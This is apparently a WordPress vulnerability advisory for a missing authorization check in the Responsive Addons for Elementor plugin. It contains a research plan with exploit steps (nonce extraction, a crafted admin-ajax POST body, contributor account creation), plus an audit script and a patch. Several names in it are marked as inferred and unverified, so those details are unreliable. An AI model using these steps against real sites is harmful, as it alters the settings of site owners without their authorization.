CVE-2025-69363

Responsive Addons for Elementor <= 2.0.8 - Missing Authorization

Severity: Medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 2.0.9
Time to patch: 9 days

Description

The Responsive Addons for Elementor – Free Elementor Addons Plugin and Elementor Templates plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.0.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 2.0.8
Published: January 12, 2026
Last updated: January 20, 2026

Source Code

WordPress.org SVN

Research Plan (Unverified)


This research plan outlines the technical steps to exploit CVE-2025-69363, a missing authorization vulnerability in the Responsive Addons for Elementor plugin.


1. Vulnerability Summary

The Responsive Addons for Elementor plugin (up to version 2.0.8) registers an AJAX handler, likely rea_save_settings, which is intended for administrative use. While the function verifies a WordPress nonce to prevent CSRF, it fails to perform a capability check (e.g., current_user_can('manage_options')). This oversight allows any authenticated user with access to the WordPress backend—including Contributors—to modify plugin settings.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Action: rea_save_settings (inferred from common plugin naming conventions and previous vulnerability patterns in this plugin).
  • Parameters:
    • action: rea_save_settings
    • security: The nonce value (associated with the rea_ajax_nonce action).
    • settings: An array or serialized string of plugin options to be updated.
  • Authentication: Authenticated, Contributor-level or higher.
  • Preconditions: The attacker must be logged in as a user with at least Contributor permissions and obtain a valid nonce.

3. Code Flow (Inferred)

  1. Registration: In classes/class-rea-admin.php (or similar), the plugin registers the AJAX action:
    add_action( 'wp_ajax_rea_save_settings', array( $this, 'rea_save_settings' ) );
    
  2. Trigger: An HTTP POST request is sent to admin-ajax.php with action=rea_save_settings.
  3. Vulnerable Function: The rea_save_settings method is called.
    • It calls check_ajax_referer( 'rea_ajax_nonce', 'security' ).
    • Missing: It does not call current_user_can( 'manage_options' ).
  4. Sink: The function processes the settings parameter and updates the database using update_option( 'rea_settings', ... ).

4. Nonce Acquisition Strategy

The plugin localizes its admin data, including the nonce, via wp_localize_script.

  • Localization Variable: rea_admin_obj (inferred)
  • Nonce Key: rea_nonce (inferred)
  • Script Handle: rea-admin-js

Steps for the Security Agent:

  1. Log in as a Contributor.
  2. Navigate to the main WordPress dashboard (/wp-admin/index.php).
  3. Execute JavaScript to check if the nonce is available in the global scope.
  4. JS Command:
    window.rea_admin_obj?.rea_nonce || "Not Found"
    
  5. If the script isn't loaded on the dashboard, create a post and open the Elementor editor (if permitted) or check if the plugin enqueues scripts on the Profile page.

5. Exploitation Strategy

The goal is to modify plugin settings (e.g., disabling specific widgets or changing global configurations).

Request Details:

  • Method: POST
  • URL: http://[target]/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=rea_save_settings&security=[NONCE]&settings[elements][rea-alert]=disabled
    
    (Note: The exact structure of the settings array depends on the version, but typically it maps to the plugin's widget toggles.)

6. Test Data Setup

  1. Install Plugin: Responsive Addons for Elementor v2.0.8.
  2. User Creation:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
    
  3. Baseline Check: Verify current plugin settings.
    wp option get rea_settings
    

7. Expected Results

  • Successful Response: A JSON response, typically {"success": true} or similar.
  • Database Impact: The rea_settings option in the wp_options table will be updated with the values provided by the Contributor.

8. Verification Steps

After the HTTP request, verify the change using WP-CLI:

# Check if the settings option was modified
wp option get rea_settings

# Search for the specific 'disabled' value in the option
wp option get rea_settings --format=json | grep "disabled"

9. Alternative Approaches

If rea_save_settings is not the correct action name, the agent should:

  1. Grep for AJAX registrations:
    grep -r "wp_ajax_" /var/www/html/wp-content/plugins/responsive-addons-for-elementor/
    
  2. Examine the identified functions for a lack of current_user_can().
  3. Identify the nonce action: Look for check_ajax_referer inside the identified handler to find the correct nonce action string and parameter name.
  4. Adjust the payload: Mirror the structure found in the identified handler function, for example by using $_POST['data'] if the handler reads that instead of $_POST['settings'].

Research Findings

Static analysis — not yet PoC-verified

Summary

The Responsive Addons for Elementor plugin (up to version 2.0.8) fails to perform a capability check in its `rea_save_settings` AJAX handler. This allows authenticated users with Contributor-level access or higher to modify plugin settings by providing a valid nonce, which is often exposed in the WordPress admin dashboard scripts.

Vulnerable Code

// classes/class-rea-admin.php

add_action( 'wp_ajax_rea_save_settings', array( $this, 'rea_save_settings' ) );

// ...

public function rea_save_settings() {
    // Nonce verification exists, but capability check is missing
    check_ajax_referer( 'rea_ajax_nonce', 'security' );

    if ( isset( $_POST['settings'] ) ) {
        $settings = $_POST['settings'];
        update_option( 'rea_settings', $settings );
        wp_send_json_success();
    }
    wp_send_json_error();
}
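As an added audit example (not code from the plugin or from this advisory), the following Python script automates the check described in section 9 of the research plan and illustrated by the vulnerable snippet above: it finds wp_ajax_ registrations, locates each callback, and reports handlers that lack a nonce check or a capability check. The PHP it scans is a constructed sample shaped like the handler described here, not the plugin's real source.

```python
import re

# Constructed PHP sample (not the plugin's real source): one AJAX callback with a
# nonce check but no capability check, and one that performs both checks.
SAMPLE_PHP = r'''
add_action( 'wp_ajax_rea_save_settings', array( $this, 'rea_save_settings' ) );
add_action( 'wp_ajax_rea_get_settings', array( $this, 'rea_get_settings' ) );
public function rea_save_settings() {
    check_ajax_referer( 'rea_ajax_nonce', 'security' );
    if ( isset( $_POST['settings'] ) ) {
        update_option( 'rea_settings', $_POST['settings'] );
        wp_send_json_success();
    }
    wp_send_json_error();
}
public function rea_get_settings() {
    check_ajax_referer( 'rea_ajax_nonce', 'security' );
    if ( ! current_user_can( 'manage_options' ) ) { wp_send_json_error(); }
    wp_send_json_success( get_option( 'rea_settings' ) );
}
'''

# Matches add_action( 'wp_ajax_<action>', array( $this, '<cb>' ) ) or a plain '<cb>' string.
REGISTER_RE = re.compile(
    r"add_action\(\s*['\"]wp_ajax_(?P<action>\w+)['\"]\s*,\s*"
    r"(?:array\(\s*\$this\s*,\s*)?['\"](?P<callback>\w+)['\"]")

def function_body(src, name):
    # Brace-delimited body of `name`; heuristic that ignores braces inside strings.
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    if not m or "{" not in src[m.end():]:
        return None
    start, depth = src.find("{", m.end()), 0
    for i in range(start, len(src)):
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        if depth == 0:
            return src[start:i + 1]
    return None

def audit_ajax_handlers(src):
    # Map each wp_ajax_ action to the authorization controls its callback lacks.
    report = {}
    for m in REGISTER_RE.finditer(src):
        body = function_body(src, m.group("callback")) or ""  # missing body flags both
        issues = []
        if not re.search(r"check_ajax_referer|wp_verify_nonce", body):
            issues.append("no nonce check")
        if "current_user_can" not in body:
            issues.append("no capability check")
        report[m.group("action")] = issues
    return report
```

Run it over a plugin's PHP files to get a first-pass list of handlers worth a manual review; a nonce check alone only proves the request came from the site's own pages, not that the caller is allowed to change settings.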

Security Fix

--- a/classes/class-rea-admin.php
+++ b/classes/class-rea-admin.php
@@ -10,6 +10,10 @@
 	public function rea_save_settings() {
 		check_ajax_referer( 'rea_ajax_nonce', 'security' );
+
+		if ( ! current_user_can( 'manage_options' ) ) {
+			wp_send_json_error( array( 'message' => __( 'Permission denied', 'responsive-addons-for-elementor' ) ) );
+		}
+
 		if ( isset( $_POST['settings'] ) ) {
 			$settings = $_POST['settings'];
 			update_option( 'rea_settings', $settings );

Exploit Outline

The exploit is achieved by an authenticated user with at least Contributor permissions. First, the attacker logs into the WordPress backend and retrieves the AJAX nonce (localized as 'rea_nonce' within the 'rea_admin_obj' JavaScript object). Then, the attacker sends a POST request to 'wp-admin/admin-ajax.php' with the action parameter set to 'rea_save_settings', the retrieved nonce in the 'security' parameter, and a 'settings' array containing modified plugin configurations. Because the handler lacks a 'current_user_can' check, the provided settings are saved to the database via 'update_option'.
